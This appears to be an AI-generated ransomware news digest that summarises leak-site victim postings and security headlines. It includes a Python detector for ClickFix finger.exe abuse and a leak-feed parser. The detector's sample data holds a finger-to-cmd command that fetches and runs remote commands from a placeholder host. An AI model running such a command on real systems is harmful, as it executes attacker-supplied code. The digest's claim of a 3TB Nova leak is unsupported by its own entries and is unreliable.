Ransomware Update – 2025-11-16

[Content by Gemini 2.5]

Latest Ransomware News and New File Extensions

  • Akira:

    • New Encrypted File Extension: Not specified in the article.
    • Attack Methods: Targeting and exploiting Nutanix Virtual Machines (VMs).
    • Targets: Critical organizations utilizing Nutanix infrastructure.
    • Decryption Status: Not specified; no public decryptor is mentioned, so recovery other than from backups implies negotiation with the attackers.
    • Source: The "Akira RaaS Targets Nutanix VMs, Threatens Critical Orgs" item under News Details below.
  • Qilin:

    • New Encrypted File Extension: Not specified in the articles.
    • Attack Methods: Data exfiltration and extortion via leak site publication.
    • Targets: Maresa Logística, SES Société Energies Services, FREEDL GROUP s.r.l., Spark Power, Sol Trading, Trigg Laboratories.
    • Decryption Status: Not specified; negotiation with attackers is the implied path.
    • Source: Leak-site monitoring entries listed under News Details below.
  • Brotherhood:

    • New Encrypted File Extension: Not specified in the articles.
    • Attack Methods: Data exfiltration (claiming specific data sizes) and extortion via leak site publication.
    • Targets: Horst Realty, Spoleta Construction, Cera Stribley, Kaener Personal, Ninas Jewellery.
    • Decryption Status: Not specified; negotiation with attackers is the implied path.
    • Source: Leak-site monitoring entries listed under News Details below; the claimed sizes are the gang's own figures and are unverified.
  • Nova:

    • New Encrypted File Extension: Not specified in the articles.
    • Attack Methods: Data exfiltration and extortion via leak site publication. Claims a large data leak (3TB) from one victim.
    • Targets: University of Gävle (Sweden), Saude Fortaleza (Brazil), Stark Shipping (Ukraine), ANG BROTHERS (M&E) PTE. LTD. (Singapore), SWISS ROSE Factory (Iraq), Medidores Industriales y Medicos SA de CV.
    • Decryption Status: Not specified; negotiation with attackers is the implied path.
    • Source: Leak-site monitoring entries listed under News Details below.
  • Incransom:

    • New Encrypted File Extension: Not specified in the article.
    • Attack Methods: Data exfiltration and extortion via leak site publication.
    • Targets: Eakas Corp., a Tier 1 supplier to the US automotive industry.
    • Decryption Status: Not specified; negotiation with attackers is the implied path.
    • Source: Leak-site monitoring entry listed under News Details below.
  • Other Active Groups:

    • Attack Methods: Data exfiltration and extortion via public shaming on leak sites.
    • Targets:
      • Alphalocker: Bangkok Eagle Wings Co.,Ltd. (Thailand)
      • Crypto24: Bayu Buana Travel Service
      • Handala: Claimed an attack on Shabak’s airport security systems (unverified; the leak-site post reproduced under News Details is a taunt rather than a data listing, and Handala operates as a hacktivist persona rather than a conventional ransomware affiliate).
      • Killsec: Force Brokerage
      • Safepay: Killingly Public Schools (USA)
      • Worldleaks: UNOde50 (Spain), Jefferson Enterprises, LLC, Platinum Healthcare Staffing, Herman & Chamow.
    • Decryption Status: Not specified for any of the victims.
    • Source: Leak-site monitoring entries listed under News Details below.

Observations and Further Recommendations

  • A wide array of ransomware groups remains highly active, targeting a diverse range of global industries including logistics, manufacturing, education, government, and healthcare. This demonstrates the sector-agnostic and widespread nature of current ransomware threats.
  • The Akira ransomware group is specifically noted for evolving its tactics to target Nutanix virtual machine infrastructure, highlighting a trend of attackers focusing on specialized and high-value enterprise technologies.
  • North Korean threat actors continue to innovate, now using JSON storage services for covert malware delivery and engaging in IT worker fraud to generate revenue, posing a persistent and multifaceted threat.
  • Organizations should prioritize patching the XWiki flaw (CVE-2025-24893) and the FortiWeb zero-day described below; both are reported as actively exploited in the wild, and both give attackers an initial-access foothold on internet-facing systems.
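The finger-based ClickFix technique reported under News Details below (the Windows finger client used to retrieve remote commands that are then executed) is cheap to hunt for, because finger (TCP/79) is almost never used legitimately on modern Windows endpoints. The detector below is an added example, not code from any of the cited reports. It runs over constructed process-creation and network telemetry records; the field names (image, parent, cmdline, dst_port) and the specific "finger ... | cmd" pipeline pattern are assumptions for this example, chosen to represent the typical shape of such commands rather than any command quoted in the articles.

```python
"""Hunt for finger.exe abuse of the kind described in the ClickFix news item.

Added example. The telemetry records below are constructed for illustration;
their field names are assumptions and do not correspond to any particular
EDR schema.
"""
import re

# Constructed sample events (not real telemetry). Two kinds: "process"
# (process creation, Sysmon EID 1 / Windows 4688 style) and "network"
# (outbound connection, Sysmon EID 3 style).
EVENTS = [
    {"type": "process", "host": "WS-07", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd /c finger payload@203.0.113.10 | more +2 | cmd"},
    {"type": "process", "host": "WS-07", "image": r"C:\Windows\System32\finger.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "finger payload@203.0.113.10"},
    {"type": "network", "host": "WS-07", "image": r"C:\Windows\System32\finger.exe",
     "dst_ip": "203.0.113.10", "dst_port": 79, "proto": "tcp"},
    {"type": "process", "host": "WS-12", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe notes.txt"},
    {"type": "process", "host": "WS-12", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "cmd /c dir"},
]

# finger invoked with a user@host argument (the form that fetches a remote
# "plan" which the attacker controls).
FINGER_RE = re.compile(r"(?:^|[\\\s])finger(?:\.exe)?\s+[^\s|]*@[^\s|]+", re.I)
# Output of the previous command piped (optionally via `more +N` to skip the
# banner lines) into a command interpreter.
PIPE_TO_SHELL_RE = re.compile(
    r"\|\s*(?:more\s+\+\d+\s*\|\s*)?(?:cmd|powershell|pwsh)(?:\.exe)?\b", re.I)


def classify(event):
    """Return (severity, reason) for a suspicious event, or None."""
    if event["type"] == "process":
        cmd = event["cmdline"]
        uses_finger = (bool(FINGER_RE.search(cmd))
                       or event["image"].lower().endswith("\\finger.exe"))
        if not uses_finger:
            return None
        if PIPE_TO_SHELL_RE.search(cmd):
            return ("high", "finger output piped into a shell interpreter")
        return ("medium", "finger.exe invoked with user@host argument")
    if event["type"] == "network":
        if event["proto"] == "tcp" and event["dst_port"] == 79:
            return ("medium", "outbound TCP/79 (finger) from endpoint")
    return None


def detect(events):
    """Run classify() over a batch of events and collect the findings."""
    findings = []
    for e in events:
        hit = classify(e)
        if hit:
            findings.append({"host": e["host"], "severity": hit[0], "reason": hit[1]})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['host']}: [{f['severity']}] {f['reason']}")
```

In practice the network rule is the more robust of the two, since the command line can be obfuscated but the finger protocol still needs TCP/79; blocking outbound port 79 at the egress firewall removes the technique entirely, and an allow-list exception is unlikely ever to be needed.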

News Details

  • RondoDox Exploits Unpatched XWiki Servers to Pull More Devices Into Its Botnet: The botnet malware known as RondoDox has been observed exploiting a critical security flaw in unpatched XWiki instances that allows attackers to achieve arbitrary code execution. The vulnerability in question is CVE-2025-24893 (CVSS score: 9.8).
  • Five Plead Guilty in U.S. for Helping North Korean IT Workers Infiltrate 136 Companies: The U.S. Department of Justice (DoJ) on Friday announced that five individuals have pleaded guilty to assisting North Korea’s illicit revenue generation schemes by enabling information technology (IT) worker fraud in violation of international sanctions.
  • North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels: The North Korean threat actors behind the Contagious Interview campaign have once again tweaked their tactics by using JSON storage services to stage malicious payloads.
  • Microsoft: Windows 10 KB5068781 ESU update may fail with 0x800f0922 errors: Microsoft has confirmed it is investigating a bug causing the Windows 10 KB5068781 extended security update to fail to install with 0x800f0922 errors on devices with corporate licensing.
  • Decades-old ‘Finger’ protocol abused in ClickFix malware attacks: The decades-old “finger” command is making a comeback, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.
  • Jaguar Land Rover cyberattack cost the company over $220 million: Jaguar Land Rover (JLR) published its financial results for July 1 to September 30, warning that the cost of a recent cyberattack totaled £196 million ($220 million) in the quarter.
  • Logitech confirms data breach after Clop extortion attack: Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July.
  • Five plead guilty to helping North Koreans infiltrate US firms: The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea’s illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft.
  • Anthropic claims of Claude AI-automated cyberattacks met with doubt: Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company’s Claude Code AI model.
  • Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks: Fortinet has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now being widely exploited.
  • Tim Cook could step down as Apple CEO next year: According to the Financial Times, Tim Cook could step down as Apple CEO as early as next year. And the board has started to seriously work out a succession plan. FT says that John Ternus, Apple’s senior vice-president of hardware engineering, is considered the frontrunner for the position.
  • Here are 25 of our favorite outdoorsy deals from REI’s massive Holiday Sale: REI doesn’t do Black Friday, but that doesn’t mean you won’t be able to save this holiday season. The outdoor retailer’s annual Holiday Sale is now underway and runs through November 24th, offering up to 30 percent off gadgets and gear designed for the outdoors.
  • Possessor(s) is a fast-paced action game that gets off to a slow start: I remember being blown away by the 2024 reveal trailer for Possessor(s), the new game from Hyper Light Drifter developer Heart Machine. The trailer features a striking art design, where an animated 2D character explores and fights in side-scrolling environments with gorgeous 3D backgrounds, and it’s all set to moody, powerful music.
  • How to find music you will love without the algorithm: While there is plenty of criticism to be hurled at what music the algorithm serves to us, and how, the real problem with music discovery in the age of algorithmic recommendations is that listening has become a passive activity. It’s too easy to press play and let a pile of code take the wheel.
  • Framework’s franken-laptop is back with big chip upgrades and familiar frustrations: Framework did it again. It promised modular, upgradeable, and user-repairable laptops where other manufacturers dare not venture or have outright failed. And it’s delivered. The 2025 version of the Framework Laptop 16 comes with not only new AMD Ryzen AI CPU options, but also Wi-Fi 7, a more powerful USB-C charger, redesigned cooling, and a new webcam.
  • The Steam Machine feels like the TV gaming PC I’ve always wanted: The morning of Monday, October 27th, I started my workweek by asking my colleagues at The Verge for advice on buying a gaming PC. I wanted a small, portable, and semi-powerful machine that could easily sit beneath my living room TV and occasionally move over to my desk to play games or even use for work.
  • Pluribus’ third episode throws a bomb into things: If you weren’t clear on just what a miserable person Carol (Rhea Seehorn) is, episode 3 of Pluribus sure makes it obvious. It opens with a flashback, as Carol and her partner Helen (Miriam Shor) are on a dream vacation at an ice hotel in Norway, and all she can do is complain about how cold it is.
  • YouTube TV, ESPN, and Disney: the latest on the blackout that’s now over: Disney and YouTube have reached an agreement to bring back ESPN and more than 20 other Disney-owned channels two weeks after they went dark on YouTube TV.
  • Disney and ESPN are back on YouTube TV: ESPN and other Disney-owned channels will be returning to YouTube TV following a new agreement announced Friday. More than 20 channels went dark on YouTube TV on October 30th, but two weeks later — and after CEOs Bob Iger and Sundar Pichai reportedly got more involved in negotiations — the companies have reached a deal.
  • The best early Black Friday deals we’ve found so far on laptops, TVs, and more: Black Friday is the most anticipated day of the year for bargain hunters. While there’s still some time to go before November 28th, we’re already starting to see a healthy selection of early discounts, allowing you to get a jump on your holiday shopping.
  • Akira RaaS Targets Nutanix VMs, Threatens Critical Orgs: The Akira ransomware group has been experimenting with new tools, bugs, and attack surfaces, with demonstrated success in significant sectors.
  • New Security Tools Target Growing macOS Threats: A public dataset and platform-agnostic analysis tool aim to help organizations in the fight against Apple-targeted malware, which researchers say has lacked proper attention.
  • Hardened Containers Look to Eliminate Common Source of Vulnerabilities: A kitchen-sink approach to building containers has loaded many with vulnerabilities. A handful of companies are trying to slim them down.
  • 150,000 Packages Flood NPM Registry in Token Farming Campaign: A self-replicating attack led to a tidal wave of malicious packages in the NPM registry, targeting tokens for the tea.xyz protocol.
  • Learning Sales Skills Can Make Security Professionals More Effective: Amazon Web Services VP Sara Duffer highlights the top lessons she brought back to her security role after taking part in Amazon’s shadow program.
  • 🏴‍☠️ Qilin has just published a new victim : Maresa Logística: N/A
  • 🏴‍☠️ Alphalocker has just published a new victim : www.bew.co.th: Bangkok Eagle Wings Co.,Ltd. 67/14 Mu 5 Chuamsamphan Rd., Kokfad, Nongchok, Bangkok 10530, Thailand. Stamping process, welding and assembly process, machining process, painting process.
  • 🏴‍☠️ Qilin has just published a new victim : SES Société Energies Services: N/A
  • 🏴‍☠️ Qilin has just published a new victim : FREEDL GROUP s.r.l.: N/A
  • 🏴‍☠️ Brotherhood has just published a new victim : Horst Realty: Contains: 27 Gb compressed Files, Emails
  • 🏴‍☠️ Brotherhood has just published a new victim : Spoleta Construction: Contains: 4 Gb compressed Free Files + 33 Gb compressed Paid Files, Database
  • 🏴‍☠️ Brotherhood has just published a new victim : Cera Stribley: Contains: 2 Gb compressed Free Files + 138 Gb compressed Paid Files
  • 🏴‍☠️ Brotherhood has just published a new victim : Kaener Personal: Contains: 139 Gb compressed Paid Files
  • 🏴‍☠️ Brotherhood has just published a new victim : Ninas Jewellery: [AI generated] Nina’s Jewellery is a family-owned jewelry business with over 30 years of experience in the industry. Based in Australia, it offers a wide selection of fine jewelry featuring diamonds, colored gemstones, gold and pearls.
  • 🏴‍☠️ Nova has just published a new victim : University of Gävle: University of Gävle is a university college located in Gävle, Sweden. The university was established in 1977 and is currently organized into three academies and nine departments.
  • 🏴‍☠️ Nova has just published a new victim : Saude Fortaleza: Secretaria Municipal de Saude de Fortaleza is a company that operates in the Custom Software & IT Services industry. It employs 20 to 49 people and has 10M to 25M of revenue. The company is headquartered in Brazil.
  • 🏴‍☠️ Nova has just published a new victim : Stark Shipping: Ukraine. A maritime service provider with extensive experience in the Black and Azov seas. Offers port agency services, cargo chartering (for bulk and liquid goods), and market analysis for customers.
  • 🏴‍☠️ Nova has just published a new victim : ANG BROTHERS (M&E) PTE. LTD. (P1): ANG BROTHERS (M&E) PTE. LTD. (the “Company”) is an Exempt Private Company Limited by Shares, incorporated on 22 July 2002 (Monday) in Singapore. The address of the Company’s registered office is in the SHUN LI INDUSTRIAL PARK estate.
  • 🏴‍☠️ Nova has just published a new victim : SWISS ROSE Factory: Swiss Rose is a prominent company in the Iraqi market, recognized for its O2 brand, which focuses on various care products. Their offerings include home care, fabric care, surface care, and personal care categories.
  • 🏴‍☠️ Nova has just published a new victim : Medidores Industriales y Medicos SA de CV: MYIMSA specializes in industrial and medical instrumentation, particularly in the field of nuclear medicine. The company offers advanced technology and highly trained experts to ensure precise results for sample processing.
  • 🏴‍☠️ Qilin has just published a new victim : Spark Power: N/A
  • 🏴‍☠️ Handala has just published a new victim : Smile for the Camera – Handala Is Watching: This Saturday, Handala RedWanted decided to do things differently. We set our sights directly on the Shabak, your regime’s so-called security guardians. But do you truly feel safe? As long as we are here, that’s little more than an illusion.
  • 🏴‍☠️ Killsec has just published a new victim : Force Brokerage: Price ??? Disclosures 0/1
  • 🏴‍☠️ Crypto24 has just published a new victim : Bayu Buana Travel Service: We have successfully extracted over 500GB of documents from your internal network, including internal company documents, customer and project information, and other data stored within your internal systems.
  • 🏴‍☠️ Safepay has just published a new victim : killinglyschools.org: Killingly Public Schools is a K-12 public school district based in Danielson, Connecticut, serving students in the town of Killingly. …
  • 🏴‍☠️ Incransom has just published a new victim : eakas.com: Eakas Corp. specializes in producing both functional and decorative products for the automotive industry, serving as a Tier 1 supplier to manufacturers in the United States. Revenue: $81.3 Million.
  • 🏴‍☠️ Qilin has just published a new victim : Sol Trading: N/A
  • 🏴‍☠️ Worldleaks has just published a new victim : UNOde50: [AI generated] UNOde50 is a Spanish jewelry and accessory brand. Established in the late ’90s, it initially created only 50 units of each design, hence its name which translates as “One of 50.”
  • 🏴‍☠️ Worldleaks has just published a new victim : Jefferson Enterprises, LLC: [AI generated] N/A
  • 🏴‍☠️ Worldleaks has just published a new victim : Platinum Healthcare Staffing: [AI generated] Platinum Healthcare Staffing is a company that specializes in providing skilled medical professionals to healthcare facilities. Established in 2005 in Los Angeles, California…
  • 🏴‍☠️ Worldleaks has just published a new victim : Herman & Chamow: [AI generated] “Herman & Chamow” is a certified public accounting firm based in California. Its primary services revolve around auditing, accounting, and tax-related matters.
  • 🏴‍☠️ Qilin has just published a new victim : Trigg Laboratories: N/A
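The leak-site monitoring entries above all share one shape: an optional flag emoji, the group name, the fixed phrase "has just published a new victim :", the victim name, and a free-text description that is sometimes "N/A", sometimes an "[AI generated]" blurb, and sometimes the gang's own claim of how much data was taken. The parser below is an added example, not code from the monitoring feed or from any of the cited articles; it normalises such lines into records, pulls claimed data volumes out of the description (treating the feed's "Gb" as gigabytes, which is what leak sites mean by it), marks victims listed only by domain name, and separates gang-written claims from AI-generated blurbs. The sample lines are copied from the entries above and are the only input the block needs.

```python
"""Normalise leak-site monitoring feed lines into structured records.

Added example. FEED holds lines copied from the feed entries on this page;
the record layout and the "claimed_gb" heuristic are this example's own.
"""
import re

FEED = [
    "🏴‍☠️ Qilin has just published a new victim : Maresa Logística: N/A",
    "🏴‍☠️ Brotherhood has just published a new victim : Spoleta Construction: "
    "Contains: 4 Gb compressed Free Files + 33 Gb compressed Paid Files, Database",
    "🏴‍☠️ Crypto24 has just published a new victim : Bayu Buana Travel Service: "
    "We have successfully extracted over 500GB of documents from your internal network.",
    "🏴‍☠️ Safepay has just published a new victim : killinglyschools.org: "
    "Killingly Public Schools is a K-12 public school district based in Danielson, Connecticut.",
    "🏴‍☠️ Worldleaks has just published a new victim : Jefferson Enterprises, LLC: [AI generated] N/A",
]

# Leading \W* swallows the flag emoji and whitespace; the victim name is the
# shortest run up to the first ": " so that "Contains: ..." stays in the description.
LINE_RE = re.compile(
    r"^\W*(?P<group>\w+) has just published a new victim : (?P<victim>.+?): (?P<desc>.*)$")
# Sizes as gangs write them: "27 Gb", "500GB", "3TB", "1.5 TB".
SIZE_RE = re.compile(r"(\d+(?:[.,]\d+)?)\s*(TB|GB|MB)\b", re.I)
DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
UNIT_GB = {"TB": 1024.0, "GB": 1.0, "MB": 1 / 1024.0}
AI_TAG = "[AI generated]"


def parse_entry(line):
    """Parse one feed line; return a record dict or None if it is not a victim post."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    desc = m["desc"].strip()
    ai_blurb = desc.startswith(AI_TAG)
    if ai_blurb:
        desc = desc[len(AI_TAG):].strip()
    if desc.upper() == "N/A":
        desc = ""
    # Sum every size mentioned; "free" and "paid" portions are usually both listed.
    claimed_gb = sum(float(n.replace(",", ".")) * UNIT_GB[u.upper()]
                     for n, u in SIZE_RE.findall(desc))
    victim = m["victim"].strip()
    return {
        "group": m["group"],
        "victim": victim,
        "victim_is_domain": bool(DOMAIN_RE.match(victim)),
        "description": desc,
        "ai_generated_blurb": ai_blurb,
        # Gang's own claim, not a verified figure.
        "claimed_gb": claimed_gb,
    }


def parse_feed(lines):
    """Parse a batch of lines, silently skipping anything that is not a victim post."""
    return [rec for rec in map(parse_entry, lines) if rec]


def by_group(records):
    """Count victim posts per group, the figure most daily digests report."""
    counts = {}
    for rec in records:
        counts[rec["group"]] = counts.get(rec["group"], 0) + 1
    return counts


if __name__ == "__main__":
    recs = parse_feed(FEED)
    for rec in recs:
        print(f"{rec['group']:<12} {rec['victim']:<32} claimed={rec['claimed_gb']:g} GB"
              f"{'  (domain only)' if rec['victim_is_domain'] else ''}")
    print(by_group(recs))
```

Two things the records make explicit that the raw lines hide: a victim listed only as a domain has not necessarily been identified, and an "[AI generated]" description says nothing about what was actually taken, so only the claimed_gb of gang-written posts should feed any exposure estimate.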